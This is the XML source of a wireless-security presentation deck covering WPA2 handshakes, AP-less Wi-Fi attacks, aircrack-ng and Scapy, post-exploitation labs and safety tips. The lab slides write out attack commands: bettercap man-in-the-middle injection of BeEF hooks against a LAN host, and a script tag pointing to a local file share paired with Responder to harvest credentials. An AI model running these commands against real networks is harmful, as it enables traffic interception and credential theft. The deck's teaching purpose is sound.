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80" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="259" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="260" r:id="rId18"/>
    <p:sldId id="272" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="27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5" y="3085766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7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4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9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5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1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2393952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41" y="2228004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3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4"/>
            <a:ext cx="519476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4"/>
            <a:ext cx="5194771" cy="553373"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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4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0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3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9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1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8" y="933452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30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8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6456918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2"/>
            <a:ext cx="6917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456918"/>
            <a:ext cx="105251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5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2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4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4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642391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6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6423916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6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hf sldNum="0"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\\local.IP\content.js%3e%3c\scrip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5384B-C5D7-4E21-BAF9-6594E7A37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359" b="372"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="9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D88B9-BC0D-41E2-80D3-DB22B5697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2"/>
            <a:ext cx="10225531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Wireless security- 802.11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DA3C0-B480-4D13-B566-10B1304685BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7970363" y="4256202"/>
            <a:ext cx="370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Shalom Onyibe,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Assurance Services, Protec.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Image result for wosec kenya">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30AE374C-1FC2-4850-AB3F-9ABF92BC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6" y="4256202"/>
            <a:ext cx="734047" cy="73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997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2DC383-A05D-4068-9307-6CE813850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E693F-46F6-49EA-9D17-7EF31C24F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9639BB-614B-4D04-B962-C3522777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75459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="20C9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033299-7E01-4261-8E3E-BD3EAEE2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99246"/>
            <a:ext cx="11298933" cy="48824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9CA598D3-3CA9-430C-B5B3-C52D7B584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506" y="1015861"/>
            <a:ext cx="7054989" cy="42682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528FCE-6AEF-4801-B325-66AEA343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00" y="5405451"/>
            <a:ext cx="7987552" cy="646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3434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22DC383-A05D-4068-9307-6CE813850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90E693F-46F6-49EA-9D17-7EF31C24F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61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9639BB-614B-4D04-B962-C3522777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75459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2DD1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9033299-7E01-4261-8E3E-BD3EAEE2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99246"/>
            <a:ext cx="11298933" cy="48824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Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF1D158-2137-478E-9067-AC79ABF9A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506" y="1015861"/>
            <a:ext cx="7054989" cy="426826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9B5CFD0-FD92-4E4F-A691-8F4C8BC7A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37" y="5465127"/>
            <a:ext cx="7987552" cy="646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8470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2DC383-A05D-4068-9307-6CE813850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0E693F-46F6-49EA-9D17-7EF31C24F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29639BB-614B-4D04-B962-C3522777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75459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6DA0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9033299-7E01-4261-8E3E-BD3EAEE2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99246"/>
            <a:ext cx="11298933" cy="48824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Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4363196-0AD5-4159-95C7-7B8550645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506" y="1015861"/>
            <a:ext cx="7054989" cy="426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3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1A4C0-01CE-4F96-8BE0-E6C8CF0C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513903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WPA/WPA2 Pre-Shared Key- 4 WAY Handshake</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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FB2DE344-4B57-4951-AD32-230FF93A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62" y="1317014"/>
            <a:ext cx="3572758" cy="46837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Password Based Key Derivation Function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFC 2898 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PBKDF2(Passphrase, SSID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssidLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 4096, 256) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4096 – Number of times the passphrase is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hashed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>256 – Intended Key Length of PSK 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8ECEB-90DC-4733-8470-DC4DA97C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422079"/>
            <a:ext cx="6831503" cy="39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77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2" descr="Image result for vulnerability detected">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDDDC98-0BB9-45B0-92DC-BCDF3C6956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3" b="12560"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143977" y="643467"/>
            <a:ext cx="990404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5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58F03-33F1-4CE5-8486-57CD177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841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AP-Less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hacking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7DF9E9-9B08-4430-B52F-AA4E5B31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368978" cy="36344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E2F0FD-56AA-47FF-AF24-FF9DA01C6D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684113" y="3262263"/>
            <a:ext cx="8951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Can I derive your password without an access point?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5699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027D7-F204-4742-8BBA-C658B198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Can You Spot IT?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" b="1" dirty="0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159224C-A8F4-44DA-AEFC-4876E3D7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293988"/>
            <a:ext cx="6831503" cy="4252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00E88-8671-4617-B96A-95264A4B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448" y="5564012"/>
            <a:ext cx="7987552" cy="646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9680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Image result for scapy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B776C54F-254E-4FBD-BA04-F7CBE45E4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139" y="1116550"/>
            <a:ext cx="5331481" cy="22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ircrack-ng">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F955FA36-A41A-4D13-9187-BEC99A2A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5" y="659567"/>
            <a:ext cx="5331478" cy="319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58F03-33F1-4CE5-8486-57CD177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99" y="4596992"/>
            <a:ext cx="4497881" cy="16070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Practical Session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7DF9E9-9B08-4430-B52F-AA4E5B31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  <a:p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7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58F03-33F1-4CE5-8486-57CD177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018" y="186686"/>
            <a:ext cx="7368978" cy="11887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6 modes of a wireless NIC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7DF9E9-9B08-4430-B52F-AA4E5B31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79" y="3330390"/>
            <a:ext cx="11050513" cy="322729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Monitor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Master – Access Point/Base station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Managed/Infrastructure - Clients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Ad-Hoc/P2P – Connecting 2 or more devices together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Mesh – Planned Ad-hoc - Routers acting as gateways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Repeater – connect and repeat network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58F03-33F1-4CE5-8486-57CD177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018" y="186686"/>
            <a:ext cx="7368978" cy="11887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Post Exploitation - LABS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7DF9E9-9B08-4430-B52F-AA4E5B31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54" y="2607267"/>
            <a:ext cx="11050513" cy="32272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Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + Beef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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -I eth0 -T 192.168.0.104 --proxy-module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injecthtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --html-iframe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert BEEF html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“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-./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -X -T 192.168.x.x --proxy-module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injectjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js-url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enter hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + Beef + Shells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1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B9EC6EB-20B4-47D9-B377-8AB3F9EDF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36C949B4-5E5E-45F0-B080-BB4709DDE1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r="-1" b="-1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1D6CD10-98FC-4295-B0E3-77908B8EC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58F03-33F1-4CE5-8486-57CD177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018" y="186686"/>
            <a:ext cx="7368978" cy="11887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Try undercover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7DF9E9-9B08-4430-B52F-AA4E5B31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79" y="3330390"/>
            <a:ext cx="11050513" cy="322729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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>file:////local.IP/content.js&gt;&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; + responder –I eth0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Self signed certificates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Social Engineering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Eaphammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + Beef + Responder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SSLSTRIP…..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SNMP enumeration…..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5BA95-262C-4DEC-A50F-D7765187C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147" y="2897240"/>
            <a:ext cx="2880659" cy="36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3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58F03-33F1-4CE5-8486-57CD177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018" y="186686"/>
            <a:ext cx="7368978" cy="11887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Tips to stay safe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7DF9E9-9B08-4430-B52F-AA4E5B31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33" y="1766047"/>
            <a:ext cx="11050513" cy="4110319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Use strong passphrases.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Delete insecure wireless profiles from your device.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Security Awareness Trainings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Enable MAC address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Configure wireless router to use static IP addresses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Keep your router’s software up-to-date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Enable network encryption – AES, VPNs.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Enable router firewall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Use a WIPS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Public Key Pinning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HTTP Strict Transport Security (HSTS) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5685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074" name="Picture 2" descr="Image result for thank you">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA75081C-4E42-43C3-962C-0FBFE43858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r="4650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="453302" y="457200"/>
            <a:ext cx="7588885" cy="589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8534C-CFA5-45DD-B403-A2A5D62766A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8372723" y="850791"/>
            <a:ext cx="3202016" cy="4198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0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 Please?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91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58F03-33F1-4CE5-8486-57CD177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Topics covering today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Graphic 15" descr="Presentation with Checklist">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B6CDF88-AB80-49FE-B547-314EB9E1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7DF9E9-9B08-4430-B52F-AA4E5B31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368978" cy="36344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802.11 history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WPA/WPA2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Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ng suite and Scapy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Post exploitation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Tips to stay safe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88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74C62C3-0C91-41B3-9B4F-9BA9DC6F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6" b="7387"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="74141" y="67972"/>
            <a:ext cx="12191980" cy="68579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0F44C0-8901-4594-8DAC-58F104D49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61" y="1142528"/>
            <a:ext cx="10261602" cy="3678303"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>IEEE 802.11 – June 1997</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> 802.11a, 802.11b, 802.11c, 802.11g etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open,  WEP,  WPA-PSK, WPA2-PSK,  WPA/WPA2 Enterprise &amp; WPA3 authentications.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74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58F03-33F1-4CE5-8486-57CD177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Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Threats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7DF9E9-9B08-4430-B52F-AA4E5B31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368978" cy="36344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MiTM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Malware infections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DOS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Social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AP-less attacks ….*NEW but old BUT *NEW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8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B4332E-47B1-4EDB-959C-3F4BA27E0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556184" y="259237"/>
            <a:ext cx="10298258" cy="57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58F03-33F1-4CE5-8486-57CD177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WPA-2 Handshake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7DF9E9-9B08-4430-B52F-AA4E5B31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049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3C479-1376-4D60-B97E-4B0767899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24" y="643466"/>
            <a:ext cx="776455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679B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C8948B-70F9-44CE-971A-B104A9A2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586" y="1123527"/>
            <a:ext cx="764282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5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2DC383-A05D-4068-9307-6CE813850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E693F-46F6-49EA-9D17-7EF31C24F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9639BB-614B-4D04-B962-C3522777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75459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="689E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033299-7E01-4261-8E3E-BD3EAEE2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99246"/>
            <a:ext cx="11298933" cy="48824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1DDD08DD-3894-4BF3-A66F-C05EFD71C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506" y="1015861"/>
            <a:ext cx="7054989" cy="426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8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8763CB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Wingdings 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>Wireless security- 802.11</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Topics covering today</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Wifi Threats</vt:lpstr>
      <vt:lpstr>The WPA-2 Handshake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WPA/WPA2 Pre-Shared Key- 4 WAY Handshake</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>AP-Less Wifi Hacking</vt:lpstr>
      <vt:lpstr>Can You Spot IT?</vt:lpstr>
      <vt:lpstr>Practical Session</vt:lpstr>
      <vt:lpstr>6 modes of a wireless NIC </vt:lpstr>
      <vt:lpstr>Post Exploitation - LABS</vt:lpstr>
      <vt:lpstr>Try undercover</vt:lpstr>
      <vt:lpstr>Tips to stay safe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security- 802.11</dc:title>
  <dc:creator>Onyibe Shalom</dc:creator>
  <cp:lastModifiedBy>Onyibe Shalom</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-08-17T05:48:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-17T05:48:37Z</dcterms:modified>
</cp:coreProperties>
</file>